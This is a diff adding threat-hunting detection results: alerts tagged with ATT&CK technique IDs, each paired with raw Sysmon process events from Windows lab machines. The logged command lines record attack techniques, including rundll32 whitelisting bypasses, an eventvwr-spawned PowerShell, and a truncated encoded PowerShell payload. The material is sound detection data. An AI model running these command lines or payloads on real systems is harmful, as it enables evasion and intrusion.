+    <EventRecordID>6173</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""980"" ThreadID=""2220"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-27 15:12:44.023</Data>
+    <Data Name=""ProcessGuid"">365ABB72-FE6C-5CEB-0000-0010050C0C00</Data>
+    <Data Name=""ProcessId"">3520</Data>
+    <Data Name=""Image"">C:\Windows\System32\wbem\WMIC.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">WMI Commandline Utility</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">C:\Windows\system32\wbem\wmic.exe  /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name=&quot;VSS&quot;) get state</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">365ABB72-7B40-5CEC-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=4368DBD172224EC9461364BE1AC9DFFC5D9224A8,MD5=A03CF3838775E0801A0894C8BACD2E56,SHA256=132AA270790F56A7524CAB968927ED5E1D91B9A26D4BADCB24E450E7DECC5F81,IMPHASH=B59AF26B08AA14BA66272388BC9C2443</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-FE6B-5CEB-0000-00102A090C00</Data>
+    <Data Name=""ParentProcessId"">1536</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name=&quot;VSS&quot;) get state</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( &quot;C:\Windows\System32\rundll32.exe&quot;  advpack.dll,RegisterOCX c:\Windows\System32\calc.exe)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-12T14:18:09.589507Z"">
+    </TimeCreated>
+    <EventRecordID>16452</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2036"" ThreadID=""296"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-12 14:18:09.573</Data>
+    <Data Name=""ProcessGuid"">365ABB72-2B21-5CD8-0000-001039DD2500</Data>
+    <Data Name=""ProcessId"">816</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot;  advpack.dll,RegisterOCX c:\Windows\System32\calc.exe</Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-2523-5CD8-0000-00204C360100</Data>
+    <Data Name=""LogonId"">0x1364c</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-2B1B-5CD8-0000-0010CCC92500</Data>
+    <Data Name=""ParentProcessId"">3320</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( &quot;C:\Windows\System32\rundll32.exe&quot;  advpack.dll,RegisterOCX c:\Windows\System32\calc.exe )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-12T14:18:09.589507Z"">
+    </TimeCreated>
+    <EventRecordID>16452</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2036"" ThreadID=""296"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-12 14:18:09.573</Data>
+    <Data Name=""ProcessGuid"">365ABB72-2B21-5CD8-0000-001039DD2500</Data>
+    <Data Name=""ProcessId"">816</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot;  advpack.dll,RegisterOCX c:\Windows\System32\calc.exe</Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-2523-5CD8-0000-00204C360100</Data>
+    <Data Name=""LogonId"">0x1364c</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-2B1B-5CD8-0000-0010CCC92500</Data>
+    <Data Name=""ParentProcessId"">3320</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( &quot;C:\Windows\System32\rundll32.exe&quot;  advpack.dll,RegisterOCX c:\Windows\System32\calc.exe )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-12T14:18:09.589507Z"">
+    </TimeCreated>
+    <EventRecordID>16452</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2036"" ThreadID=""296"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-12 14:18:09.573</Data>
+    <Data Name=""ProcessGuid"">365ABB72-2B21-5CD8-0000-001039DD2500</Data>
+    <Data Name=""ProcessId"">816</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot;  advpack.dll,RegisterOCX c:\Windows\System32\calc.exe</Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-2523-5CD8-0000-00204C360100</Data>
+    <Data Name=""LogonId"">0x1364c</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-2B1B-5CD8-0000-0010CCC92500</Data>
+    <Data Name=""ParentProcessId"">3320</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1603490297.543898,2020-10-24T01:58:17.543898+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\rundll32.exe) with commandline ( &quot;C:\Windows\SysWOW64\rundll32.exe&quot; &quot;C:\Windows\SysWOW64\shell32.dll&quot;,#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-10-23T21:58:17.543407Z"">
+    </TimeCreated>
+    <EventRecordID>424115</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3208"" ThreadID=""4804"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-10-23 21:58:17.542</Data>
+    <Data Name=""ProcessGuid"">747F3D96-51F9-5F93-0000-0010551E5E00</Data>
+    <Data Name=""ProcessId"">9116</Data>
+    <Data Name=""Image"">C:\Windows\SysWOW64\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\SysWOW64\rundll32.exe&quot; &quot;C:\Windows\SysWOW64\shell32.dll&quot;,#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-4690-5F93-0000-002019A60800</Data>
+    <Data Name=""LogonId"">0x8a619</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-51F9-5F93-0000-001003125E00</Data>
+    <Data Name=""ParentProcessId"">7552</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""ParentCommandLine"">Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1603490297.543898,2020-10-24T01:58:17.543898+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( &quot;C:\Windows\SysWOW64\rundll32.exe&quot; &quot;C:\Windows\SysWOW64\shell32.dll&quot;,#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222 )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-10-23T21:58:17.543407Z"">
+    </TimeCreated>
+    <EventRecordID>424115</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3208"" ThreadID=""4804"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-10-23 21:58:17.542</Data>
+    <Data Name=""ProcessGuid"">747F3D96-51F9-5F93-0000-0010551E5E00</Data>
+    <Data Name=""ProcessId"">9116</Data>
+    <Data Name=""Image"">C:\Windows\SysWOW64\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\SysWOW64\rundll32.exe&quot; &quot;C:\Windows\SysWOW64\shell32.dll&quot;,#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-4690-5F93-0000-002019A60800</Data>
+    <Data Name=""LogonId"">0x8a619</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-51F9-5F93-0000-001003125E00</Data>
+    <Data Name=""ParentProcessId"">7552</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""ParentCommandLine"">Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[ T1086 ]  Powershell with Suspicious Argument,1557367201.794022,2019-05-09T06:00:01.794022+04:00,,Threat,Critical,"Found User (IEWIN7\IEUser) run Suspicious PowerShell commands that include (powershell,\Windows\System32) in event with Command Line (&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot;) and Parent Image :C:\Windows\System32\eventvwr.exe , Parent CommandLine (&quot;C:\Windows\system32\eventvwr.exe&quot;) in directory : ( C:\Windows\system32\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-09T01:59:29.090897Z"">
+    </TimeCreated>
+    <EventRecordID>11116</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1980"" ThreadID=""1904"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-09 01:59:28.903</Data>
+    <Data Name=""ProcessGuid"">365ABB72-8980-5CD3-0000-0010134D1F00</Data>
+    <Data Name=""ProcessId"">3840</Data>
+    <Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Windows PowerShell</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; </Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-863B-5CD3-0000-00204A390100</Data>
+    <Data Name=""LogonId"">0x1394a</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-8980-5CD3-0000-00105F451F00</Data>
+    <Data Name=""ParentProcessId"">3884</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\eventvwr.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\eventvwr.exe&quot; </Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1603490297.543898,2020-10-24T01:58:17.543898+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( &quot;C:\Windows\SysWOW64\rundll32.exe&quot; &quot;C:\Windows\SysWOW64\shell32.dll&quot;,#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222 )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-10-23T21:58:17.543407Z"">
+    </TimeCreated>
+    <EventRecordID>424115</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3208"" ThreadID=""4804"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-10-23 21:58:17.542</Data>
+    <Data Name=""ProcessGuid"">747F3D96-51F9-5F93-0000-0010551E5E00</Data>
+    <Data Name=""ProcessId"">9116</Data>
+    <Data Name=""Image"">C:\Windows\SysWOW64\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\SysWOW64\rundll32.exe&quot; &quot;C:\Windows\SysWOW64\shell32.dll&quot;,#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-4690-5F93-0000-002019A60800</Data>
+    <Data Name=""LogonId"">0x8a619</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-51F9-5F93-0000-001003125E00</Data>
+    <Data Name=""ParentProcessId"">7552</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""ParentCommandLine"">Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558920560.034674,2019-05-27T05:29:20.034674+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot;  list vdir &quot;Description: Cannot read configuration file due to insufficient permissions&quot; /text:userName ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-27T01:29:20.034674Z"">
+    </TimeCreated>
+    <EventRecordID>5976</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""324"" ThreadID=""2260"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-27 01:29:19.994</Data>
+    <Data Name=""ProcessGuid"">365ABB72-3D6F-5CEB-0000-001032DBFF00</Data>
+    <Data Name=""ProcessId"">1900</Data>
+    <Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
+    <Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Application Server Command Line Admin Tool</Data>
+    <Data Name=""Product"">Internet Information Services</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot;  list vdir &quot;Description: Cannot read configuration file due to insufficient permissions&quot; /text:userName</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
+    <Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
+    <Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
+    <Data Name=""LogonId"">0x82423</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
+    <Data Name=""ParentProcessId"">2584</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot;  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAY